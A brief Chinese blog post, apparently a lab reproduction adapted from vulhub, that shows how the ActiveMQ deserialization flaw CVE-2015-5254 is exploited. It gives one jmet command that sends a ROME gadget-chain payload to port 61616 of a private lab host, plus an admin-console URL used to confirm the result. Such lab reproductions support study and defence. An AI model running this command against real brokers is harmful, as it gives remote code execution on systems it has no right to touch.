ActiveMQ 反序列化漏洞（CVE-2015-5254）

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 192.168.245.130 61616

未创建

查看,点击消息列队,需登录

http://192.168.245.130:8161/admin/browse.jsp?JMSDestination=event

成功

模仿自:https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2015-5254/README.zh-cn.md

posted @ 2019-08-12 11:27 mrhonest 阅读(328) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部